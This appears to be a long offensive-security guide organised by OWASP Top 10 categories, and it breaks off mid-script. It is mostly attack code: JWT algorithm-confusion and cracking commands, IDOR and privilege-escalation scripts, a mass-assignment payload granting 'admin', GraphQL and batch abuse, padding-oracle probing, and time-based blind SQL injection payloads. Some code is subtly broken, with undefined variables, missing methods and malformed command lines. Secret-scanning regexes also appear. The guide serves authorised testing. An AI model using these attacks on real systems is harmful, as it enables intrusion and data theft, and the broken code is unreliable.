Comprehensive Encyclopedia of Offensive Security Tools, Techniques, and Procedures
The OWASP Top 10 represents the most critical web application security risks, but defending against them requires understanding the attacker's toolkit. This comprehensive guide details professional-grade tools, advanced techniques, and operational procedures for testing each vulnerability category. We'll cover everything from basic reconnaissance to sophisticated exploitation chains, emphasizing authorized testing methodologies and real-world workflows.
Legal & Ethical Disclaimer: All tools and techniques described herein must be used only on systems you own or have explicit written authorization to test. Unauthorized testing is illegal and unethical. Always establish clear rules of engagement and scope before any security assessment.
Access control failures occur when applications fail to properly enforce authorization policies, allowing users to perform actions outside their intended permissions. Modern applications implement several models:
Discretionary Access Control (DAC): Resource owners control access (UNIX file permissions) Mandatory Access Control (MAC): System-enforced policies (SELinux, AppArmor) Role-Based Access Control (RBAC): Permissions assigned to roles Attribute-Based Access Control (ABAC): Policies based on user/resource attributes
# Advanced Burp configuration for access control testing
java -jar burpsuite_pro.jar --project-file=project.burp --config-file=burp.cfg
# Burp configuration file (burp.cfg):
burp {
suite {
# Increase memory for large applications
vmargs = "-Xmx8G -XX:+UseG1GC -XX:MaxGCPauseMillis=200"
}
proxy {
# Configure upstream proxy for corporate environments
upstream_proxy = "proxy.corp.com:8080"
# SSL interception
ssl {
certificate_export = "/certs/"
client_certificates = "/certs/client.p12"
}
}
scanner {
# Custom scan configurations
audit_depth = 10
audit_items = ["access_control", "idor"]
}
}
# Export project data for team collaboration
java -jar burpsuite_pro.jar --export-project --format=json --output=project_export.json# ZAP Docker deployment for CI/CD integration
docker run -v $(pwd):/zap/wrk -t owasp/zap2docker-stable zap-baseline.py \
-t https://target.com \
-g gen.conf \
-r report.html \
-J report.json \
-w report.md
# ZAP automation script (zap_script.js)
var HttpSender = Java.type('org.parosproxy.paros.network.HttpSender')
var ScriptVars = Java.type('org.zaproxy.zap.extension.script.ScriptVars')
function sendingRequest(msg, initiator, helper) {
// Add custom headers for all requests
msg.getRequestHeader().setHeader("X-Test-ID", "ACCESS-CTRL-2024")
// Modify session tokens for testing
if (msg.getRequestHeader().getURI().toString().contains("/api/")) {
var cookies = msg.getRequestHeader().getHeader("Cookie")
if (cookies && cookies.includes("session=")) {
// Test with other users' session tokens
var newCookies = cookies.replace(/session=[^;]+/, "session=ATTACKER_SESSION_TOKEN")
msg.getRequestHeader().setHeader("Cookie", newCookies)
}
}
}
# ZAP API automation with Python
import zapv2
import time
zap = zapv2.ZAPv2(apikey='your-api-key', proxies={'http': 'http://127.0.0.1:8080'})
# Spider with advanced configuration
zap.spider.set_option_max_depth(5)
zap.spider.set_option_thread_count(5)
scan_id = zap.spider.scan('https://target.com')
# Active scan with custom policies
scan_policy = {
'attackStrength': 'HIGH',
'alertThreshold': 'MEDIUM',
'scannerId': [40000, 40001] # Access control and IDOR scanners
}
zap.ascan.enable_scanners(scan_policy)#!/usr/bin/env python3
"""
Advanced IDOR detector with pattern recognition
Detects sequential/numeric UUIDs, predictable patterns
"""
import re
import requests
from urllib.parse import urlparse, parse_qs
from collections import Counter
import json
import hashlib
class IDORDetector:
def __init__(self, target_url, session_cookies=None):
self.target = target_url
self.session = requests.Session()
if session_cookies:
self.session.cookies.update(session_cookies)
self.param_patterns = {
'numeric': r'\b\d{1,10}\b',
'uuid': r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
'base64': r'[A-Za-z0-9+/=]{20,}',
'hex': r'[0-9a-fA-F]{16,}',
'date': r'\d{4}-\d{2}-\d{2}'
}
def analyze_parameters(self, url):
"""Extract and classify parameters"""
parsed = urlparse(url)
params = parse_qs(parsed.query)
param_types = {}
for param, values in params.items():
for value in values:
param_types[param] = self.classify_value(value)
return param_types
def classify_value(self, value):
"""Classify parameter values"""
for ptype, pattern in self.param_patterns.items():
if re.match(pattern, value, re.IGNORECASE):
return ptype
return 'unknown'
def generate_test_values(self, param_type, original_value):
"""Generate test values based on parameter type"""
tests = []
if param_type == 'numeric':
base = int(original_value)
tests = [
str(base - 1), str(base + 1),
str(base * 2), str(base // 2),
'0', '-1', '999999999'
]
elif param_type == 'uuid':
# Generate similar UUIDs
import uuid
tests = [str(uuid.uuid4()) for _ in range(5)]
return tests
def test_idor(self, url, sensitive_keywords=None):
"""Test for IDOR vulnerabilities"""
results = []
param_types = self.analyze_parameters(url)
for param, ptype in param_types.items():
test_values = self.generate_test_values(ptype, original_value)
for test_val in test_values:
# Modify URL with test value
test_url = self.modify_param(url, param, test_val)
try:
response = self.session.get(test_url, timeout=10)
# Analyze response for sensitive data
if self.is_sensitive_response(response, sensitive_keywords):
results.append({
'parameter': param,
'original_value': original_value,
'test_value': test_val,
'status_code': response.status_code,
'response_length': len(response.text),
'indicators': self.extract_indicators(response.text)
})
except Exception as e:
continue
return results
# Usage
detector = IDORDetector('https://api.target.com/user/123/profile')
results = detector.test_idor(['SSN', 'credit_card', 'password'])# JWT Toolkit (jwt_tool) advanced usage
# Install: git clone https://github.com/ticarpi/jwt_tool
# Comprehensive JWT attack
python3 jwt_tool.py eyJ0eXAiOiJKV1Qi... \
-M at \ # All tests
-X a \ # Algorithm confusion
-k public.pem \ # Public key for confusion
-d /usr/share/wordlists/rockyou.txt \ # Dictionary attack
-t http://target.com/api/user \ # Target for verification
-cv "email" \ # Claim to verify
-rh "Authorization: Bearer {token}" \ # Request header format
-S \ # Generate SQLi payloads in claims
-pc "user_id" \ # Target claim for manipulation
-pv "admin" \ # Value to inject
-T \ # Tamper mode
-out crafted_jwt.txt # Output crafted tokens
# JWT crack with hashcat
# First convert JWT to hashcat format
echo -n "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" > header.txt
echo -n "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ" > payload.txt
# For HS256
hashcat -m 16500 jwt.hash wordlist.txt -O -w 4
# For RS256 public key extraction and misuse
python3 jwt_tool.py eyJ0eXAi... -X k -pk public_key.pem -pc payload_claim
# JWT automatic scanner integration
python3 jwt_automate.py \
--target http://target.com \
--wordlist jwt_secrets.txt \
--threads 10 \
--output results.json \
--verify-endpoint /api/verify \
--valid-keyword "success"#!/usr/bin/env python3
"""
GraphQL authorization bypass tester
Tests for inadequate field-level permissions
"""
import requests
import json
import sys
from graphql import build_ast_schema, parse
from graphql.utilities import get_operation_ast
class GraphQLAuthTester:
def __init__(self, endpoint, headers=None):
self.endpoint = endpoint
self.headers = headers or {'Content-Type': 'application/json'}
self.introspection_query = """
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
"""
def get_introspection(self):
"""Fetch GraphQL schema via introspection"""
response = requests.post(
self.endpoint,
json={'query': self.introspection_query},
headers=self.headers
)
return response.json()
def extract_sensitive_fields(self, schema):
"""Identify potentially sensitive fields"""
sensitive_keywords = [
'password', 'email', 'ssn', 'credit', 'card',
'admin', 'role', 'permission', 'token', 'secret',
'salary', 'address', 'phone', 'birth'
]
sensitive_fields = []
for type_def in schema.get('data', {}).get('__schema', {}).get('types', []):
if type_def.get('fields'):
for field in type_def['fields']:
field_name = field.get('name', '').lower()
if any(keyword in field_name for keyword in sensitive_keywords):
sensitive_fields.append({
'type': type_def['name'],
'field': field['name'],
'description': field.get('description', '')
})
return sensitive_fields
def test_field_level_access(self, query_template, user_tokens):
"""Test if different users can access same fields"""
results = []
for token_name, token_value in user_tokens.items():
headers = self.headers.copy()
headers['Authorization'] = f'Bearer {token_value}'
response = requests.post(
self.endpoint,
json={'query': query_template},
headers=headers
)
if response.status_code == 200:
data = response.json()
# Check if sensitive data is present
if self.contains_sensitive_data(data):
results.append({
'user': token_name,
'has_access': True,
'data_exposed': self.extract_sensitive_values(data)
})
return results
# Usage
tester = GraphQLAuthTester('https://target.com/graphql')
schema = tester.get_introspection()
sensitive_fields = tester.extract_sensitive_fields(schema)# Automated horizontal privilege escalation testing
#!/bin/bash
# Test user A accessing user B's resources
USER_A_TOKEN="eyJ0eXAi..."
USER_B_ID="456"
# Test endpoints with User A's token accessing User B's data
ENDPOINTS=(
"/api/users/${USER_B_ID}/profile"
"/api/orders?user_id=${USER_B_ID}"
"/api/documents/${USER_B_ID}/files"
"/api/messages/${USER_B_ID}"
)
for endpoint in "${ENDPOINTS[@]}"; do
echo "Testing: $endpoint"
curl -s -H "Authorization: Bearer $USER_A_TOKEN" \
"https://target.com$endpoint" \
| jq '. | select(.error == null)' \
&& echo "VULNERABLE: User A can access $endpoint"
sleep 1
done
# Mass assignment testing with different user contexts
cat > mass_assignment_test.py << 'EOF'
import requests
import json
def test_mass_assignment(target_url, token_a, token_b):
"""Test if user can modify other users' attributes"""
# First get user B's data with admin token
headers_a = {'Authorization': f'Bearer {token_a}'}
user_b_data = requests.get(f'{target_url}/api/users/456', headers=headers_a).json()
# Try to modify with user A's token (lower privilege)
headers_b = {'Authorization': f'Bearer {token_b}'}
# Attempt to change sensitive fields
payload = {
'email': 'attacker@evil.com',
'role': 'admin',
'is_active': True,
'permissions': ['read', 'write', 'delete']
}
# Merge with existing data
attack_payload = {**user_b_data, **payload}
response = requests.put(
f'{target_url}/api/users/456',
json=attack_payload,
headers=headers_b
)
return response.status_code == 200
EOF# Batch request IDOR testing
import requests
import json
def test_batch_idor(target_url, session_token):
"""Test for IDOR in batch endpoints"""
headers = {
'Authorization': f'Bearer {session_token}',
'Content-Type': 'application/json'
}
# Craft batch request with mixed user IDs
batch_payload = {
"requests": [
{"method": "GET", "path": "/api/users/123/profile"},
{"method": "GET", "path": "/api/users/456/profile"}, # Other user
{"method": "GET", "path": "/api/users/789/profile"},
{"method": "POST", "path": "/api/users/456/update", "body": {"role": "admin"}}
]
}
response = requests.post(
f"{target_url}/api/batch",
json=batch_payload,
headers=headers
)
if response.status_code == 200:
responses = response.json().get('responses', [])
for i, resp in enumerate(responses):
if resp.get('status') == 200:
print(f"Batch request {i} succeeded - potential IDOR")
print(f"Response: {resp.get('body', '')[:200]}")
# Test GraphQL batching for IDOR
graphql_batch = """
[
{"query": "query { user(id: 123) { email privateData } }"},
{"query": "query { user(id: 456) { email privateData } }"},
{"query": "mutation { updateUser(id: 456, input: {role: \"admin\"}) { id } }"}
]
"""#!/bin/bash
# Advanced TLS scanner with detailed reporting
TARGET="example.com"
OUTPUT_DIR="./tls_audit_$(date +%Y%m%d_%H%M%S)"
mkdir -p $OUTPUT_DIR
echo "[*] Starting comprehensive TLS audit for $TARGET"
# 1. SSL Labs-style comprehensive test
echo "[*] Running testssl.sh full audit"
./testssl.sh --openssl-timeout 5 --warnings batch --color 0 \
--htmlfile $OUTPUT_DIR/testssl_full.html \
--jsonfile $OUTPUT_DIR/testssl_full.json \
$TARGET
# 2. Cipher suite enumeration with grading
echo "[*] Enumerating cipher suites with SSLScan"
sslscan --no-failed --no-renegotiation --no-compression \
--no-heartbleed --no-renegotiation --no-fallback \
--xml=$OUTPUT_DIR/sslscan.xml $TARGET
# 3. TLS version support with compatibility matrix
echo "[*] Testing TLS version support"
for version in ssl2 ssl3 tls1 tls1_1 tls1_2 tls1_3; do
echo "Testing $version..."
openssl s_client -connect $TARGET:443 \
-$version < /dev/null 2>&1 | grep -E "Protocol|Cipher|Secure Renegotiation" \
> $OUTPUT_DIR/tls_$version.txt
done
# 4. Certificate transparency log checking
echo "[*] Checking certificate transparency logs"
curl -s "https://crt.sh/?q=%.$TARGET&output=json" | jq . > $OUTPUT_DIR/cert_transparency.json
# 5. OCSP stapling check
echo "[*] Testing OCSP stapling"
openssl s_client -connect $TARGET:443 -status < /dev/null 2>&1 \
| grep -A 17 "OCSP response" > $OUTPUT_DIR/ocsp_response.txt
# 6. Certificate chain validation
echo "[*] Validating certificate chain"
openssl s_client -showcerts -connect $TARGET:443 < /dev/null 2>&1 \
| awk '/BEGIN CERT/,/END CERT/ {print $0}' \
> $OUTPUT_DIR/certificate_chain.pem
# Analyze each certificate in chain
openssl x509 -in $OUTPUT_DIR/certificate_chain.pem -text -noout \
| grep -E "Subject:|Issuer:|Not Before:|Not After :|Signature Algorithm:|Public Key Algorithm:" \
> $OUTPUT_DIR/certificate_details.txt
# 7. Check for weak signature algorithms
echo "[*] Checking for weak signature algorithms"
openssl s_client -connect $TARGET:443 < /dev/null 2>&1 \
| openssl x509 -text -noout | grep "Signature Algorithm" \
| grep -E "sha1|md5" && echo "WEAK SIGNATURE ALGORITHM DETECTED"
# 8. Check for mixed content issues
echo "[*] Checking for mixed content"
curl -s https://$TARGET | grep -i "http://" | grep -v "http://$TARGET" \
> $OUTPUT_DIR/mixed_content.txt
# 9. HSTS preload status
echo "[*] Checking HSTS configuration"
curl -sI https://$TARGET | grep -i strict-transport-security \
> $OUTPUT_DIR/hsts_headers.txt
# 10. Generate comprehensive report
cat > $OUTPUT_DIR/report.md << EOF
# TLS/SSL Security Audit Report
## Target: $TARGET
## Date: $(date)
## Executive Summary
$(./testssl.sh $TARGET --color 0 | grep -A 5 "Overall rating")
## Detailed Findings
### Certificate Information
$(cat $OUTPUT_DIR/certificate_details.txt)
### Vulnerabilities Found
$(grep -i "vulnerable\|weak\|not offered" $OUTPUT_DIR/testssl_full.html | head -20)
### Recommendations
1. Disable weak cipher suites
2. Enable TLS 1.3
3. Implement proper HSTS headers
4. Ensure certificate transparency logging
EOF
echo "[+] Audit complete. Reports saved to $OUTPUT_DIR"#!/usr/bin/env python3
"""
Advanced TLS fingerprinting tool
Identifies specific implementations (OpenSSL, NSS, Schannel, etc.)
"""
import socket
import ssl
import json
from dataclasses import dataclass
from typing import Dict, List
import hashlib
@dataclass
class TLSFingerprint:
target: str
port: int = 443
timeout: int = 5
def get_tls_fingerprint(self):
"""Collect TLS handshake characteristics"""
fingerprint = {}
# Test different TLS versions
tls_versions = [
(ssl.PROTOCOL_TLSv1, "TLSv1"),
(ssl.PROTOCOL_TLSv1_1, "TLSv1.1"),
(ssl.PROTOCOL_TLSv1_2, "TLSv1.2"),
(ssl.PROTOCOL_TLS, "TLS") # Highest supported
]
for proto, name in tls_versions:
try:
context = ssl.SSLContext(proto)
context.set_ciphers('ALL:COMPLEMENTOFALL')
with socket.create_connection((self.target, self.port), self.timeout) as sock:
with context.wrap_socket(sock, server_hostname=self.target) as ssock:
cipher = ssock.cipher()
cert = ssock.getpeercert(binary_form=True)
fingerprint[name] = {
'cipher_suite': cipher[0],
'protocol_version': cipher[1],
'key_length': cipher[2],
'certificate_sha256': hashlib.sha256(cert).hexdigest() if cert else None,
'session_id': ssock.session.id if ssock.session else None,
'session_reused': ssock.session_reused,
'compression': ssock.compression()
}
except Exception as e:
fingerprint[name] = {'error': str(e)}
# Get all supported ciphers
fingerprint['supported_ciphers'] = self.get_supported_ciphers()
return fingerprint
def get_supported_ciphers(self):
"""Test all possible cipher suites"""
ciphers = []
cipher_list = [
'ECDHE-RSA-AES256-GCM-SHA384',
'ECDHE-ECDSA-AES256-GCM-SHA384',
'ECDHE-RSA-AES256-SHA384',
'ECDHE-ECDSA-AES256-SHA384',
'ECDHE-RSA-AES256-SHA',
'ECDHE-ECDSA-AES256-SHA',
'SRP-DSS-AES-256-CBC-SHA',
'SRP-RSA-AES-256-CBC-SHA',
# ... extensive cipher list
]
for cipher in cipher_list:
try:
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.set_ciphers(cipher)
with socket.create_connection((self.target, self.port), self.timeout) as sock:
with context.wrap_socket(sock, server_hostname=self.target) as ssock:
if ssock.cipher()[0] == cipher:
ciphers.append(cipher)
except:
continue
return ciphers
def identify_implementation(self, fingerprint):
"""Identify TLS implementation based on fingerprint"""
implementations = {
'OpenSSL': {
'characteristics': ['supports_tls_fallback_scsv', 'session_ticket_ext'],
'ciphers': ['ECDHE-RSA-AES256-GCM-SHA384', 'DHE-RSA-AES256-GCM-SHA384']
},
'NSS (Mozilla)': {
'characteristics': ['supports_signed_cert_timestamps', 'ec_point_formats'],
'ciphers': ['ECDHE-RSA-AES256-GCM-SHA384', 'ECDHE-ECDSA-AES256-GCM-SHA384']
},
'Schannel (Windows)': {
'characteristics': ['tls_ext_ms', 'tls_ext_reneg'],
'ciphers': ['TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384']
},
'BoringSSL (Google)': {
'characteristics': ['google_pinning', 'tls_ext_signed_cert'],
'ciphers': ['TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384']
}
}
matches = []
for impl, chars in implementations.items():
score = 0
# Check cipher suite matches
for cipher in chars['ciphers']:
if cipher in fingerprint.get('supported_ciphers', []):
score += 1
# Check characteristic matches
for char in chars['characteristics']:
if char in str(fingerprint):
score += 2
if score > 0:
matches.append((impl, score))
return sorted(matches, key=lambda x: x[1], reverse=True)
# Usage
fingerprinter = TLSFingerprint("example.com")
fingerprint = fingerprinter.get_tls_fingerprint()
implementations = fingerprinter.identify_implementation(fingerprint)#!/usr/bin/env python3
"""
Padding Oracle Attack Detector
Tests for vulnerable CBC mode implementations
"""
import requests
import time
from base64 import b64encode, b64decode
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad, unpad
class PaddingOracleDetector:
def __init__(self, target_url, ciphertext_param='cipher'):
self.target_url = target_url
self.cipher_param = ciphertext_param
self.block_size = 16 # AES block size
def test_oracle(self, ciphertext):
"""Test if server behaves as a padding oracle"""
test_cases = [
# Valid ciphertext (should return 200)
ciphertext,
# Modified last byte (might cause padding error)
self.modify_last_byte(ciphertext),
# Completely random ciphertext
self.generate_random_ciphertext(),
# Short ciphertext
ciphertext[:self.block_size * 2],
]
responses = []
for test_ct in test_cases:
start_time = time.time()
response = self.send_ciphertext(test_ct)
elapsed = time.time() - start_time
responses.append({
'ciphertext': test_ct[:32] + '...',
'status_code': response.status_code,
'response_time': elapsed,
'error_keywords': self.check_error_keywords(response.text),
'content_length': len(response.content)
})
return responses
def check_error_keywords(self, response_text):
"""Check for padding-related error messages"""
padding_keywords = [
'padding', 'decrypt', 'cipher', 'invalid',
'PKCS', 'bad', 'error', 'exception',
'malformed', 'encoding', 'cryptographic'
]
found = []
for keyword in padding_keywords:
if keyword.lower() in response_text.lower():
found.append(keyword)
return found
def automated_exploit_test(self):
"""Automated test for padding oracle vulnerability"""
# Example: If application uses encrypted session cookies
session_cookie = "ENCRYPTED_SESSION_VALUE"
# Test timing attacks
timing_differences = []
for i in range(100):
# Send valid request
start = time.perf_counter()
self.send_ciphertext(session_cookie)
valid_time = time.perf_counter() - start
# Send invalid padding
invalid_ct = self.modify_last_byte(session_cookie)
start = time.perf_counter()
self.send_ciphertext(invalid_ct)
invalid_time = time.perf_counter() - start
timing_differences.append(invalid_time - valid_time)
avg_timing_diff = sum(timing_differences) / len(timing_differences)
# Check for significant timing difference
if avg_timing_diff > 0.01: # 10ms difference
return {
'vulnerable': True,
'type': 'timing_based_padding_oracle',
'average_timing_difference': avg_timing_diff
}
# Check for different error responses
error_codes = set()
for _ in range(20):
random_ct = self.generate_random_ciphertext()
response = self.send_ciphertext(random_ct)
error_codes.add(response.status_code)
if len(error_codes) > 1:
return {
'vulnerable': True,
'type': 'error_based_padding_oracle',
'different_error_codes': list(error_codes)
}
return {'vulnerable': False}
# Real-world example: ASP.NET Padding Oracle (MS10-070)
def test_aspnet_padding_oracle():
"""Test for classic ASP.NET padding oracle"""
detector = PaddingOracleDetector("https://target.com/WebResource.axd")
# ASP.NET specific tests
test_vectors = [
# Valid WebResource request
"/WebResource.axd?d=VALID_ENCRYPTED_STRING",
# Tampered request
"/WebResource.axd?d=TAMPERED_ENCRYPTED_STRING",
# Different error conditions
"/WebResource.axd?d=" + "A" * 100,
"/WebResource.axd",
]
for vector in test_vectors:
response = requests.get(f"https://target.com{vector}")
# Check for padding-related errors
if any(err in response.text for err in ['Padding', 'Cryptographic', 'Bad Data']):
print(f"Potential padding oracle at {vector}")#!/usr/bin/env python3
"""
Cryptographic randomness analyzer
Tests for weak PRNG usage in session tokens, CSRF tokens, etc.
"""
import requests
import collections
import math
import statistics
from typing import List
import hashlib
class RandomnessAnalyzer:
def __init__(self):
self.entropy_threshold = 3.0 # Minimum entropy per byte
def collect_samples(self, target_url, sample_count=1000):
"""Collect cryptographic tokens from target"""
samples = []
for _ in range(sample_count):
try:
# Get a page that generates tokens
response = requests.get(target_url)
# Extract potential tokens (adjust regex as needed)
import re
tokens = re.findall(r'[A-Za-z0-9+/=]{20,}', response.text)
samples.extend(tokens[:5]) # Take first few tokens
except Exception as e:
print(f"Error collecting sample: {e}")
return samples[:sample_count]
def analyze_entropy(self, tokens: List[str]):
"""Calculate Shannon entropy of tokens"""
results = []
for token in tokens:
# Calculate byte entropy
if len(token) < 16:
continue
# Count byte frequencies
byte_counts = collections.Counter(token.encode())
total_bytes = len(token)
# Calculate Shannon entropy
entropy = 0.0
for count in byte_counts.values():
probability = count / total_bytes
entropy -= probability * math.log2(probability)
# Normalize to bits per byte
entropy_per_byte = entropy
results.append({
'token': token[:20] + '...',
'length': len(token),
'entropy_per_byte': entropy_per_byte,
'is_weak': entropy_per_byte < self.entropy_threshold
})
return results
def test_for_bias(self, tokens: List[str]):
"""Test for statistical bias in tokens"""
if not tokens:
return None
# Convert tokens to bytes and analyze patterns
all_bytes = b''.join([t.encode() for t in tokens])
# Chi-square test for uniform distribution
byte_counts = [0] * 256
for byte in all_bytes:
byte_counts[byte] += 1
total_bytes = len(all_bytes)
expected = total_bytes / 256
chi_square = sum((observed - expected) ** 2 / expected
for observed in byte_counts)
# Degrees of freedom = 255
# Critical value for p=0.05 is ~293
is_biased = chi_square > 293
# Test for sequential patterns
sequential_patterns = 0
for i in range(len(all_bytes) - 1):
if abs(all_bytes[i] - all_bytes[i + 1]) == 1:
sequential_patterns += 1
sequential_ratio = sequential_patterns / len(all_bytes)
return {
'chi_square': chi_square,
'is_biased': is_biased,
'sequential_patterns': sequential_patterns,
'sequential_ratio': sequential_ratio,
'total_bytes_analyzed': total_bytes
}
def detect_prng_type(self, tokens: List[str]):
"""Attempt to identify the PRNG algorithm used"""
patterns = {
'LCG': self.check_lcg_pattern,
'MT19937': self.check_mersenne_twister,
'Java_Random': self.check_java_random,
'time_based': self.check_time_based
}
detected = []
for name, checker in patterns.items():
if checker(tokens):
detected.append(name)
return detected
def check_time_based(self, tokens):
"""Check if tokens are based on timestamps"""
import time
current_time = int(time.time())
# Check if tokens contain recent timestamps
for token in tokens:
try:
# Common patterns: timestamp in hex, base64, or decimal
decoded = token
if len(decoded) >= 8:
# Try to extract timestamp
possible_ts = int(decoded[:8], 16) if all(c in '0123456789abcdefABCDEF'
for c in decoded[:8]) else 0
if abs(current_time - possible_ts) < 86400: # Within 24 hours
return True
except:
continue
return False
# Usage
analyzer = RandomnessAnalyzer()
samples = analyzer.collect_samples("https://target.com/login", 500)
entropy_results = analyzer.analyze_entropy(samples)
bias_results = analyzer.test_for_bias(samples)
prng_type = analyzer.detect_prng_type(samples)#!/bin/bash
# Comprehensive secret scanning across multiple sources
TARGET_DIR="/path/to/codebase"
OUTPUT_FILE="secrets_report_$(date +%Y%m%d).json"
echo "[*] Starting comprehensive secret scan..."
# 1. TruffleHog with all detectors
trufflehog filesystem $TARGET_DIR \
--no-verification \
--json | jq . > trufflehog_raw.json
# 2. Gitleaks with custom configuration
cat > .gitleaks.toml << 'EOF'
title = "gitleaks config"
[[rules]]
description = "AWS Access Key"
regex = '''(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'''
tags = ["key", "AWS"]
[[rules]]
description = "GitHub Token"
regex = '''gh[pousr]_[A-Za-z0-9_]{36,255}'''
tags = ["key", "GitHub"]
[[rules]]
description = "Generic API Key"
regex = '''(?i)(api[_-]?key|apikey|secret)[\s]*[=:][\s]*["']?[A-Za-z0-9]{16,64}["']?'''
tags = ["key", "API"]
EOF
gitleaks detect --source $TARGET_DIR \
--config .gitleaks.toml \
--report-format json \
--report-path gitleaks_report.json
# 3. detect-secrets with baseline comparison
detect-secrets scan $TARGET_DIR \
--all-files \
--baseline .secrets.baseline
detect-secrets audit .secrets.baseline
# 4. Custom regex scanning for business-specific secrets
cat > custom_secrets.py << 'EOF'
import re
import os
import json
def scan_for_custom_secrets(directory):
patterns = {
"database_url": r"postgres(ql)?://[^:\s]+:[^@\s]+@[^\s]+",
"jwt_secret": r"(?i)(jwt|access|refresh)[_-]?(secret|key)[\s]*[:=][\s]*['\"][A-Za-z0-9+/=]{32,}['\"]",
"encryption_key": r"(?i)(encryption|aes|des|blowfish)[_-]?(key|iv)[\s]*[:=][\s]*['\"][A-Za-z0-9+/=]{16,}['\"]",
"private_key": r"-----BEGIN (RSA|DSA|EC|OPENSSH) PRIVATE KEY-----",
"oauth": r"[0-9a-f]{32}-[0-9a-f]{32}",
}
findings = []
for root, dirs, files in os.walk(directory):
for file in files:
if file.endswith(('.py', '.js', '.java', '.php', '.rb', '.go', '.yml', '.yaml', '.json', '.env')):
filepath = os.path.join(root, file)
try:
with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
content = f.read()
for secret_type, pattern in patterns.items():
matches = re.finditer(pattern, content, re.IGNORECASE)
for match in matches:
# Get context (2 lines before and after)
lines = content.split('\n')
line_no = content[:match.start()].count('\n') + 1
context_start = max(0, line_no - 3)
context_end = min(len(lines), line_no + 2)
context = '\n'.join(lines[context_start:context_end])
findings.append({
"file": filepath,
"line": line_no,
"secret_type": secret_type,
"match": match.group()[:50] + "..." if len(match.group()) > 50 else match.group(),
"context": context
})
except Exception as e:
continue
return findings
EOF
python3 custom_secrets.py > custom_findings.json
# 5. Historical secret scanning in git
git log -p | grep -E "(pass|secret|key|token|auth)" > git_history_secrets.txt
# 6. Combine all findings
jq -s 'add' trufflehog_raw.json gitleaks_report.json custom_findings.json > $OUTPUT_FILE
echo "[+] Secret scanning complete. Report saved to $OUTPUT_FILE"#!/usr/bin/env python3
"""
AWS Secret Scanner - Find exposed AWS credentials
"""
import boto3
import re
import json
from datetime import datetime
from botocore.exceptions import ClientError
class AWSSecretScanner:
def __init__(self, aws_profile='default'):
self.session = boto3.Session(profile_name=aws_profile)
self.iam = self.session.client('iam')
self.sts = self.session.client('sts')
def scan_for_exposed_keys(self):
"""Scan for potentially exposed AWS keys"""
findings = []
# 1. List all IAM users
users = self.iam.list_users()
for user in users['Users']:
username = user['UserName']
# 2. Get access keys for each user
try:
keys = self.iam.list_access_keys(UserName=username)
for key in keys['AccessKeyMetadata']:
key_id = key['AccessKeyId']
status = key['Status']
create_date = key['CreateDate']
# 3. Check key age
key_age = (datetime.now() - create_date.replace(tzinfo=None)).days
# 4. Check last used
try:
last_used = self.iam.get_access_key_last_used(AccessKeyId=key_id)
last_used_date = last_used['AccessKeyLastUsed'].get('LastUsedDate')
if last_used_date:
days_since_use = (datetime.now() - last_used_date.replace(tzinfo=None)).days
else:
days_since_use = key_age
except:
days_since_use = key_age
# 5. Check for rotation policy violation
if key_age > 90: # 90-day rotation policy
findings.append({
'severity': 'HIGH',
'user': username,
'key_id': key_id,
'issue': f'Access key not rotated in {key_age} days',
'key_age_days': key_age,
'last_used_days': days_since_use
})
# 6. Check for unused keys
if days_since_use > 180:
findings.append({
'severity': 'MEDIUM',
'user': username,
'key_id': key_id,
'issue': f'Access key unused for {days_since_use} days',
'key_age_days': key_age,
'last_used_days': days_since_use
})
except ClientError as e:
print(f"Error checking keys for {username}: {e}")
return findings
def check_key_exposure(self, key_id, secret_key):
"""Check if key is exposed (simulated - would use internal checks)"""
# In reality, this would check internal logs, GitHub, etc.
# For demo, we'll simulate
exposed_indicators = [
'Commit history',
'Public repository',
'Log files',
'Environment variables in screenshots'
]
return {
'key_id': key_id,
'exposed': False, # Placeholder
'indicators': []
}
def generate_remediation(self, findings):
"""Generate remediation steps"""
remediation = []
for finding in findings:
if finding['severity'] == 'HIGH':
remediation.append({
'action': f"Rotate access key {finding['key_id']} for user {finding['user']}",
'steps': [
f"Create new access key for {finding['user']}",
f"Update applications using {finding['key_id']}",
f"Disable {finding['key_id']} after migration",
f"Delete {finding['key_id']} after 7 days"
]
})
return remediation
# Usage
scanner = AWSSecretScanner('production')
findings = scanner.scan_for_exposed_keys()
remediation = scanner.generate_remediation(findings)
print(json.dumps(findings, indent=2, default=str))#!/usr/bin/env python3
"""
Advanced Time-Based Blind SQL Injection Exploitation
Supports multiple databases with conditional timing
"""
import requests
import time
import string
from urllib.parse import quote
from concurrent.futures import ThreadPoolExecutor, as_completed
class TimeBasedSQLi:
def __init__(self, target_url, param_name, injection_point):
self.target_url = target_url
self.param_name = param_name
self.injection_point = injection_point
self.delay = 5 # Base delay in seconds
self.threshold = 0.5 # Time difference threshold
self.session = requests.Session()
# Database-specific payloads
self.db_payloads = {
'mysql': {
'true': f"SLEEP({self.delay})",
'false': f"SLEEP(0)",
'conditional': f"IF({{condition}},SLEEP({self.delay}),SLEEP(0))"
},
'postgresql': {
'true': f"pg_sleep({self.delay})",
'false': f"pg_sleep(0)",
'conditional': f"CASE WHEN {{condition}} THEN pg_sleep({self.delay}) ELSE pg_sleep(0) END"
},
'mssql': {
'true': f"WAITFOR DELAY '0:0:{self.delay}'",
